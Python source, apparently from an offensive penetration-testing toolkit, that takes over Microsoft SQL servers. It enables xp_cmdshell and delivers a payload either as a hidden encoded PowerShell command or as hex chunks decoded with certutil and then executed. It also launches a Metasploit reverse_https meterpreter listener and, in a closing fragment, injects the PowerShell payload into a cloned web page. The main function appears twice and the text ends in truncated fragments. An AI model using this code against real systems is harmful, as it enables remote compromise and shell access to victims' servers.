def deploy_hex2binary(ipaddr, port, username, password):
# base variable used to select payload option
option = None
choice1 = "1"
conn = _mssql.connect("{0}:{1}".format(ipaddr, port), username, password)
core.print_status("Enabling the xp_cmdshell stored procedure...")
try:
conn.execute_query(
"exec master.dbo.sp_configure 'show advanced options',1;"
"GO;"
"RECONFIGURE;"
"GO;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;"
"GO;"
"RECONFIGURE;"
"GO")
except:
pass
# just throw a simple command via powershell to get the output
try:
print(
"""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n"""
)
choice = input("Enter your choice:\n\n"
"1.) Use PowerShell Injection (recommended)\n"
"2.) Use Certutil binary conversion\n\n"
"Enter your choice [1]:")
if choice == "":
choice = "1"
if choice == "1":
core.print_status(
"Powershell injection was selected to deploy to the remote system (awesome)."
)
option_ps = input(
"Do you want to use powershell injection? [yes/no]:")
if option_ps.lower(
) == "" or option_ps == "y" or option_ps == "yes":
option = "1"
core.print_status("Powershell delivery selected. Boom!")
else:
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
core.print_status("Powershell not selected, using debug method.")
option = "2"
except Exception as err:
print(err)
payload_filename = None
# if we don't have powershell
if option == "2":
# give option to use msf or your own
core.print_status("You can either select to use a default "
"Metasploit payload here or import your "
"own in order to deliver to the system. "
"Note that if you select your own, you "
"will need to create your own listener "
"at the end in order to capture this.\n\n")
choice1 = input("1.) Use Metasploit (default)\n"
"2.) Select your own\n\n"
"Enter your choice[1]:")
if choice1 == "":
choice1 = "1"
if choice1 == "2":
attempts = 0
while attempts <= 2:
payload_filename = input(
"Enter the path to your file you want to deploy to the system (ex /root/blah.exe):"
)
if os.path.isfile(payload_filename):
break
else:
core.print_error("File not found! Try again.")
attempts += 1
else:
core.print_error(
"Computers are hard. Find the path and try again. Defaulting to Metasploit payload."
)
choice1 = "1"
if choice1 == "1":
web_path = None
prep_powershell_payload()
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
web_path = os.path.join(core.setdir + "web_clone")
# then we are using metasploit
else:
if operating_system == "posix":
web_path = core.setdir
# if it isn't there yet
if not os.path.isfile(core.setdir + "1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(core.setdir, core.setdir),
shell=True).wait()
subprocess.Popen(
"cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir),
shell=True).wait()
subprocess.Popen(
"cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null"
% (core.setdir, core.setdir),
shell=True).wait()
payload_filename = os.path.join(web_path + "1msf.exe")
with open(payload_filename, "rb") as fileopen:
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite:
filewrite.write(data)
if choice1 == "1":
# if we are using metasploit, start the listener
if not os.path.isfile(os.path.join(core.setdir + "set.payload")):
if operating_system == "posix":
try:
core.module_reload(pexpect)
except:
import pexpect
core.print_status(
"Starting the Metasploit listener...")
msf_path = core.meta_path()
child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(
os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir + "meta_config")))
# random executable name
random_exe = core.generate_random_string(10, 15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
core.print_status(
"Using universal powershell x86 process downgrade attack..")
payload = "x86"
# specify ipaddress of reverse listener
ipaddr = core.grab_ipaddress()
core.update_options("IPADDR=" + ipaddr)
port = input(
core.setprompt(["29"], "Enter the port for the reverse [443]"))
if not port:
port = "443"
core.update_options("PORT={0}".format(port))
core.update_options("POWERSHELL_SOLO=ON")
core.print_status(
"Prepping the payload for delivery and injecting alphanumeric shellcode..."
)
with open(os.path.join(core.setdir + "/payload_options.shellcode"),
"w") as filewrite:
# format needed for shellcode generation
filewrite.write(
"windows/meterpreter/reverse_https {0},".format(port))
try:
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
os.makedirs(os.path.join(core.setdir + "reports/powershell"))
with open(os.path.join(core.setdir + "x86.powershell")) as x86:
x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(
x86)
core.print_status("If you want the powershell commands and attack, "
"they are exported to {0}".format(
os.path.join(core.setdir +
"reports/powershell")))
with open(
os.path.join(
core.setdir +
"/reports/powershell/x86_powershell_injection.txt"),
"w") as filewrite:
filewrite.write(x86)
# if our payload is x86 based - need to prep msfconsole rc
if payload == "x86":
powershell_command = x86
# powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
with open(
os.path.join(core.setdir +
"reports/powershell/powershell.rc"),
"w") as filewrite:
filewrite.write(
"use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n"
"set lport {0}\n"
"set LHOST 0.0.0.0\n"
"exploit -j".format(port))
else:
powershell_command = None
# grab the metasploit path from config or smart detection
msf_path = core.meta_path()
if operating_system == "posix":
try:
core.module_reload(pexpect)
except:
import pexpect
core.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("{0} -r {1}".format(
os.path.join(msf_path + "msfconsole"),
os.path.join(core.setdir +
"reports/powershell/powershell.rc")))
core.print_status(
"Waiting for the listener to start first before we continue forward..."
)
core.print_status(
"Be patient, Metasploit takes a little bit to start...")
child2.expect("Starting the payload handler", timeout=30000)
core.print_status(
"Metasploit started... Waiting a couple more seconds for listener to activate.."
)
time.sleep(5)
# assign random_exe command to the powershell command
random_exe = powershell_command
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
# here we start the conversion and execute the payload
core.print_status(
"Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
#with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen:
fileopen = open(core.setdir + 'payload.hex', "r")
core.print_status("Dropping initial begin certificate header...")
conn.execute_query(
"exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'"
.format(random_exe))
while fileopen:
data = fileopen.read(900).rstrip()
#for data in fileopen.read(900).rstrip():
if data == "":
break
core.print_status(
"Deploying payload to victim machine (hex): {bold}{data}{endc}\n"
.format(bold=core.bcolors.BOLD,
data=data,
endc=core.bcolors.ENDC))
conn.execute_query(
"exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(
data=data, exe=random_exe))
core.print_status(
"Delivery complete. Converting hex back to binary format.")
core.print_status(
"Dropping end header for binary format conversion...")
conn.execute_query(
"exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'"
.format(random_exe))
core.print_status(
"Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled."
)
conn.execute_query(
"exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".
format(random_exe))
core.print_status(
"Executing the payload - magic has happened and now its time for that moment.. "
"You know. When you celebrate. Salute to you ninja - you deserve it."
)
conn.execute_query(
"exec master..xp_cmdshell '{0}.exe'".format(random_exe))
# if we are using SET payload
if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
core.print_status(
"Spawning separate child process for listener...")
try:
shutil.copyfile(os.path.join(core.setdir + "web_clone/x"),
definepath)
except:
pass
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py",
shell=True)
# grab the port options
# if core.check_options("PORT=") != 0:
# port = core.heck_options("PORT=")
#
# # if for some reason the port didnt get created we default to 443
# else:
# port = "443"
# thread is needed here due to the connect not always terminating thread,
# it hangs if thread isnt specified
try:
core.module_reload(thread)
except:
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
core.print_status("Triggering the powershell injection payload... ")
sql_command = (
"exec master..xp_cmdshell '{0}'".format(powershell_command))
thread.start_new_thread(conn.execute_query, (sql_command, ))
# using the old method
if option == "2":
core.print_status("Triggering payload stager...")
alphainject = ""
if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
with open(os.path.join(core.setdir +
"meterpreter.alpha")) as fileopen:
alphainject = fileopen.read()
sql_command = ("xp_cmdshell '{0}.exe {1}'".format(
random_exe, alphainject))
# start thread of SQL command that executes payload
thread.start_new_thread(conn.execute_query, (sql_command, ))
time.sleep(1)
# if pexpect doesnt exit right then it freaks out
if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
os.system("python ../../payloads/set_payloads/listener.py")
try:
# interact with the child process through pexpect
child2.interact()
try:
os.remove("x")
except:
pass
except:
pass
def deploy_hex2binary(ipaddr, port, username, password):
# base variable used to select payload option
option = None
choice1 = "1"
conn = _mssql.connect("{0}:{1}".format(ipaddr, port),
username,
password)
core.print_status("Enabling the xp_cmdshell stored procedure...")
try:
conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;"
"GO;"
"RECONFIGURE;"
"GO;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;"
"GO;"
"RECONFIGURE;"
"GO")
except:
pass
# just throw a simple command via powershell to get the output
try:
print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""")
choice = input("Enter your choice:\n\n"
"1.) Use PowerShell Injection (recommended)\n"
"2.) Use Certutil binary conversion\n\n"
"Enter your choice [1]:")
if choice == "":
choice = "1"
if choice == "1":
core.print_status("Powershell injection was selected to deploy to the remote system (awesome).")
option_ps = input("Do you want to use powershell injection? [yes/no]:")
if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
option = "1"
core.print_status("Powershell delivery selected. Boom!")
else:
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
core.print_status("Powershell not selected, using debug method.")
option = "2"
except Exception as err:
print(err)
payload_filename = None
# if we don't have powershell
if option == "2":
# give option to use msf or your own
core.print_status("You can either select to use a default "
"Metasploit payload here or import your "
"own in order to deliver to the system. "
"Note that if you select your own, you "
"will need to create your own listener "
"at the end in order to capture this.\n\n")
choice1 = input("1.) Use Metasploit (default)\n"
"2.) Select your own\n\n"
"Enter your choice[1]:")
if choice1 == "":
choice1 = "1"
if choice1 == "2":
attempts = 0
while attempts <= 2:
payload_filename = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
if os.path.isfile(payload_filename):
break
else:
core.print_error("File not found! Try again.")
attempts += 1
else:
core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
choice1 = "1"
if choice1 == "1":
web_path = None
prep_powershell_payload()
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
web_path = os.path.join(core.setdir + "web_clone")
# then we are using metasploit
else:
if operating_system == "posix":
web_path = core.setdir
# if it isn't there yet
if not os.path.isfile(core.setdir + "1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
payload_filename = os.path.join(web_path + "1msf.exe")
with open(payload_filename, "rb") as fileopen:
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite:
filewrite.write(data)
if choice1 == "1":
# if we are using metasploit, start the listener
if not os.path.isfile(os.path.join(core.setdir + "set.payload")):
if operating_system == "posix":
try:
core.module_reload(pexpect)
except:
import pexpect
core.print_status("Starting the Metasploit listener...")
msf_path = core.meta_path()
child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir + "meta_config")))
# random executable name
random_exe = core.generate_random_string(10, 15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
core.print_status("Using universal powershell x86 process downgrade attack..")
payload = "x86"
# specify ipaddress of reverse listener
ipaddr = core.grab_ipaddress()
core.update_options("IPADDR=" + ipaddr)
port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))
if not port:
port = "443"
core.update_options("PORT={0}".format(port))
core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
# format needed for shellcode generation
filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
try:
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
os.makedirs(os.path.join(core.setdir + "reports/powershell"))
with open(os.path.join(core.setdir + "x86.powershell")) as x86:
x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
core.print_status("If you want the powershell commands and attack, "
"they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite:
filewrite.write(x86)
# if our payload is x86 based - need to prep msfconsole rc
if payload == "x86":
powershell_command = x86
# powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
with open(os.path.join(core.setdir + "reports/powershell/powershell.rc"), "w") as filewrite:
filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n"
"set lport {0}\n"
"set LHOST 0.0.0.0\n"
"exploit -j".format(port))
else:
powershell_command = None
# grab the metasploit path from config or smart detection
msf_path = core.meta_path()
if operating_system == "posix":
try:
core.module_reload(pexpect)
except:
import pexpect
core.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"),
os.path.join(core.setdir + "reports/powershell/powershell.rc")))
core.print_status("Waiting for the listener to start first before we continue forward...")
core.print_status("Be patient, Metasploit takes a little bit to start...")
child2.expect("Starting the payload handler", timeout=30000)
core.print_status("Metasploit started... Waiting a couple more seconds for listener to activate..")
time.sleep(5)
# assign random_exe command to the powershell command
random_exe = powershell_command
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
# here we start the conversion and execute the payload
core.print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
#with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen:
fileopen = open(core.setdir + 'payload.hex', "r")
core.print_status("Dropping initial begin certificate header...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
while fileopen:
data = fileopen.read(900).rstrip()
#for data in fileopen.read(900).rstrip():
if data == "":
break
core.print_status("Deploying payload to victim machine (hex): {bold}{data}{endc}\n".format(bold=core.bcolors.BOLD,
data=data,
endc=core.bcolors.ENDC))
conn.execute_query("exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(data=data,
exe=random_exe))
core.print_status("Delivery complete. Converting hex back to binary format.")
core.print_status("Dropping end header for binary format conversion...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'".format(random_exe))
core.print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.")
conn.execute_query("exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".format(random_exe))
core.print_status("Executing the payload - magic has happened and now its time for that moment.. "
"You know. When you celebrate. Salute to you ninja - you deserve it.")
conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe))
# if we are using SET payload
if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
core.print_status("Spawning separate child process for listener...")
try:
shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath)
except:
pass
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
# if core.check_options("PORT=") != 0:
# port = core.heck_options("PORT=")
#
# # if for some reason the port didnt get created we default to 443
# else:
# port = "443"
# thread is needed here due to the connect not always terminating thread,
# it hangs if thread isnt specified
try:
core.module_reload(thread)
except:
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
core.print_status("Triggering the powershell injection payload... ")
sql_command = ("exec master..xp_cmdshell '{0}'".format(powershell_command))
thread.start_new_thread(conn.execute_query, (sql_command,))
# using the old method
if option == "2":
core.print_status("Triggering payload stager...")
alphainject = ""
if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen:
alphainject = fileopen.read()
sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject))
# start thread of SQL command that executes payload
thread.start_new_thread(conn.execute_query, (sql_command,))
time.sleep(1)
# if pexpect doesnt exit right then it freaks out
if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
os.system("python ../../payloads/set_payloads/listener.py")
try:
# interact with the child process through pexpect
child2.interact()
try:
os.remove("x")
except:
pass
except:
pass
try:
# specify ipaddress of reverse listener
ipaddr = core.grab_ipaddress()
core.update_options("IPADDR=" + ipaddr)
port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "":
port = "443"
core.update_options("PORT={0}".format(port))
with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
# format needed for shellcode generation
filewrite.write("{0} {1},".format(payload, port))
core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
prep_powershell_payload()
# create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
os.makedirs(os.path.join(core.setdir + "reports/powershell"))
with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
x86 = fileopen.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
#with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite:
filewrite.write(x86)
filewrite.close()
payload = "windows/meterpreter/reverse_https\n" # if we are using x86
command = x86 # assign powershell to command
# write out the payload for powershell injection to pick it up if used
filewrite = open(setdir + "/metasploit.payload", "w")
filewrite.write(choice1)
filewrite.close()
# import if on
setshell_counter = 0
powershell = check_config("POWERSHELL_INJECTION=")
if powershell.lower() == "on" or powershell.lower() == "yes":
if choice1 == "set/reverse_shell" or choice1 == "RATTE":
print_status(
"Please note that the SETSHELL and RATTE are not compatible with the powershell injection technique. Disabling the powershell attack.")
setshell_counter = 1
if setshell_counter == 0:
if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum":
if os.path.isfile("%s/web_clone/index.html" % (setdir)):
prep_powershell_payload()
if os.path.isfile("%s/x86.powershell" % (setdir)):
fileopen1 = open(
"%s/x86.powershell" % (setdir), "r")
x86 = fileopen1.read()
# open up the x86 powershell attack
fileopen3 = fileopen = open(
"%s/web_clone/index.html" % (setdir), "r")
filewrite = open(
"%s/web_clone/index.html.new" % (setdir), "w")
data = fileopen3.read()
data = data.replace(
'param name="5" value=""', 'param name="5" value="%s"' % (x86))
data = data.replace(
'param name="6" value=""', 'param name="6" value="%s"' % (x86))
# check if we don't want to deploy binaries